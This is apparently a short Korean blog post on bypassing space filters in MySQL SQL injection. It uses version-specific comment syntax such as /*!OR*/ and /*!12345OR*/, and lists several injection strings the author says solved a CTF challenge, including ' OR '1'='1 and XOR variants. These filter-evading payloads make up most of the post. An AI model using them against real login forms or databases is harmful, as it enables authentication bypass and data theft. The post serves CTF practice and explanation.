티스토리 뷰

Programming/SQL

[MySQL] Specific Code

do9dark 2015.07.03 01:44

SQL Injection 공백을 우회할 수 있는 방법 중에 한 가지.


SELECT id,pw FROM user WHERE id='admin' AND pw='admin'  OR  '1'='1';

위와 같은 Query를 실행할 경우 붉은색으로 표시된 부분에 공백을 사용하지 못할 경우


SELECT id,pw FROM user WHERE id='admin' AND pw='admin'/*!OR*/'1'='1';

SELECT id,pw FROM user WHERE id='admin' AND pw='admin'/*!12345OR*/'1'='1';

다음과 같이 사용할 수 있다.


[+] 참고



CTF에서 사용한 예제

(문제 의도와는 다르게 풀어서 주최측에서 이메일로 연락이 오기도 했지만...)


=1'/*!12345OR*/'1'='1


=1'/*!OR*/'1


=1'/*!50546OR*/'1

(50546보다 숫자가 클 경우 실패)


=1'/*!^*/'1


=1'/*!50546^*/'1


댓글
댓글쓰기 폼
«   2019/01   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
링크
공지사항
Total
68,406
Today
0
Yesterday
23